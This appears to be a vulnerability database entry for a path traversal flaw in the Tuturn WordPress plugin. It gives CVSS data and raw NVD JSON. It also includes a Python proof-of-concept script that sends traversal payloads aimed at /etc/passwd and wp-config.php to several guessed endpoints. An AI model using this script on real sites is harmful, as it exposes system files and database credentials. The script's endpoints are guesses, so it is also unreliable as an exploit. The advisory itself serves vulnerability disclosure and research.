Security Vulnerability Report
中文
CVE-2025-64235 CVSS 6.5 MEDIUM

CVE-2025-64235

Published: 2025-12-18 17:15:55
Last Modified: 2026-04-28 19:35:17

Description

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AmentoTech Tuturn allows Path Traversal.This issue affects Tuturn: from n/a before 3.6.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Tuturn < 3.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64235 Path Traversal PoC # Affected: AmentoTech Tuturn < 3.6 import requests import sys target = "http://target-site.com" # Common path traversal payloads payloads = [ "../../../../etc/passwd", "..\..\..\..\windows\win.ini", "../../../wp-config.php", "../../../../../../etc/passwd", "....//....//....//etc/passwd" ] # Try to identify the vulnerable endpoint endpoints = [ "/wp-admin/admin-ajax.php?action=tuturn_download", "/wp-content/plugins/tuturn/includes/download.php", "/?action=tuturn_download&file=" ] def test_path_traversal(): print(f"[*] Testing CVE-2025-64235 on {target}") for endpoint in endpoints: for payload in payloads: url = f"{target}{endpoint}{payload}" try: response = requests.get(url, timeout=10) if response.status_code == 200: if "root:" in response.text or "\[extensions\]" in response.text: print(f"[!] Vulnerable! Found: {url}") print(f"[+] Content preview:\n{response.text[:500]}") return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") print("[*] No vulnerable endpoint found") return False if __name__ == "__main__": test_path_traversal()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64235", "sourceIdentifier": "[email protected]", "published": "2025-12-18T17:15:55.327", "lastModified": "2026-04-28T19:35:16.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AmentoTech Tuturn allows Path Traversal.This issue affects Tuturn: from n/a before 3.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/tuturn/vulnerability/wordpress-tuturn-plugin-3-6-arbitrary-file-download-vulnerability?_s_id=cve", "source": "[email protected]"}]}}